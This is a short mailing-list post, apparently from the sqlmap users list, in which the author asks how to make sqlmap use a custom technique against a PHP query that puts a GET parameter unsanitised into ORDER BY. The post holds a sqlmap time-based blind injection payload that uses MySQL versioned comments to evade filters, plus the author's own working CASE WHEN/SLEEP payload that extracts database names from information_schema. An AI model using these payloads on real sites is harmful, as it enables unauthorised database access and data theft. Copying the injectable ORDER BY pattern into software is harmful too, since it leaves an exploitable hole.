[sqlmap-users] exp blind

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Hello, all.

I'm trying to exploit the blind injection in the following query:

$var = $_GET['var'];
SELECT id,name FROM people ORDER BY $var

sqlmap find vulnerabilities, but can not be used.

sqmap sends the following query:

name AND 561/*!50000=*/IF((ORD(MID((/*!50000SELECT*/
IF(ISNULL(/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
CHAR)),CHAR(32),/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
CHAR)) FROM /*!50000information_schema*/.SCHEMATA),1,1)) NOT BETWEEN 0 AND
1),SLEEP(5),561)

[22:20:36] [ERROR] unable to retrieve the number of databases

but it does not work. May interfere with some kind of filter.

But my request in browser url:

index.php?var=CASE WHEN (SELECT ASCII(SUBSTRING(schema_name, 1, 1)) FROM
/*!50000information_schema*/.SCHEMATA limit 0,1) NOT BETWEEN 0 AND 65 THEN
sleep(10) ELSE date END

It takes a successful ... How can I get sqlmap use my method of attack from
the one it uses by default.

Sincerely, Kirill

p.s. sorry for my bad english